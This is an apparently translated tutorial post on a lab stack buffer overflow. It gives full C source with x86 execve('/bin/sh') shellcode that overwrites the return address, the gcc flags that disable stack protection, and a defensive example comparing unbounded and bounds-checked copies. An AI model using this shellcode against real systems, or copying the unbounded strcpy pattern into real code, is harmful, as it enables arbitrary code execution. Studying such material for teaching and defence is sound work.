The attack is done under BT5 and the target program is running on an Ubuntu virtual machine.
First, you need to understand what a stack overflow attack is; read this article:
http://blog.csdn.net/cnctloveyu/article/details/4236212
The article explains the idea very clearly, but its concrete example is not quite accurate and contains a few mistakes.
Here is a modified version of the example program that I have verified runs.
shell.c

    #include <unistd.h>
    #include <string.h>   /* strlen, strcpy */

    /* Linux x86 execve("/bin/sh") shellcode */
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* Buffer sizes and the loop bound (128, 96, 32) are taken from the
     * Aleph One example this program follows; the copy on this page
     * garbled those numbers. */
    char large_string[128];

    int main(void)
    {
        char buffer[96];
        int i;
        long *long_ptr = (long *) large_string;

        /* Fill large_string with the address of buffer, so that the
         * saved return address is overwritten with a pointer back
         * into buffer. */
        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (int) buffer;

        /* Place the shellcode at the start of large_string. */
        for (i = 0; i < strlen(shellcode); i++)
            large_string[i] = shellcode[i];

        /* Unbounded copy: 128 bytes into a 96-byte buffer overflows the
         * stack frame. */
        strcpy(buffer, large_string);
        return 0;
    }
This program is compiled with: gcc -fno-stack-protector -z execstack -g -o shell shell.c
(the stack protector is disabled and the stack is made executable, otherwise the attack fails). When the program finishes executing, a new shell should open.
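To make the role of the disabled stack protector concrete, here is an added example that is not part of the original post: the unbounded copy pattern from shell.c placed beside a bounds-checked copy, with a guard word after the buffer standing in for the canary that -fno-stack-protector switches off. The buffer size, the guard value and the flat-array layout are assumptions chosen for the demonstration.

```c
#include <stdint.h>
#include <string.h>

#define BUF_LEN 96                 /* assumed: size of buffer[] in shell.c */
#define GUARD_LEN sizeof(uint32_t)
#define GUARD_VALUE 0x5A5A5A5Au    /* constructed sentinel standing in for a canary */

/* Stand-in for the frame shell.c overflows: the copy target followed by a
 * guard word, kept in one flat array so the demo itself stays in bounds. */
struct frame {
    unsigned char raw[BUF_LEN + GUARD_LEN];
};

static void frame_init(struct frame *f) {
    uint32_t g = GUARD_VALUE;
    memset(f->raw, 0, sizeof f->raw);
    memcpy(f->raw + BUF_LEN, &g, GUARD_LEN);
}

/* 1 if the guard word is untouched, 0 if a copy ran over it. */
int guard_intact(const struct frame *f) {
    uint32_t g;
    memcpy(&g, f->raw + BUF_LEN, GUARD_LEN);
    return g == GUARD_VALUE;
}

/* The pattern in shell.c: copy up to the NUL with no regard for the
 * destination size (clamped at sizeof raw only so the demo stays defined;
 * a real strcpy keeps going). Returns guard_intact() after the copy. */
int copy_unbounded(struct frame *f, const char *src) {
    size_t i;
    frame_init(f);
    for (i = 0; src[i] != '\0' && i < sizeof f->raw; i++)
        f->raw[i] = (unsigned char)src[i];
    return guard_intact(f);
}

/* Hardened counterpart: refuse anything that does not fit with its NUL.
 * Returns 0 on success, -1 when the input is rejected; the guard is never
 * reached either way. */
int copy_bounded(struct frame *f, const char *src) {
    size_t n = strlen(src);
    frame_init(f);
    if (n >= BUF_LEN)
        return -1;
    memcpy(f->raw, src, n + 1);
    return 0;
}
```

With a 100-byte input the unbounded copy reports a clobbered guard, which is exactly what the real canary check would catch when the stack protector is left enabled.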
Stack overflow attack using Metasploit (1)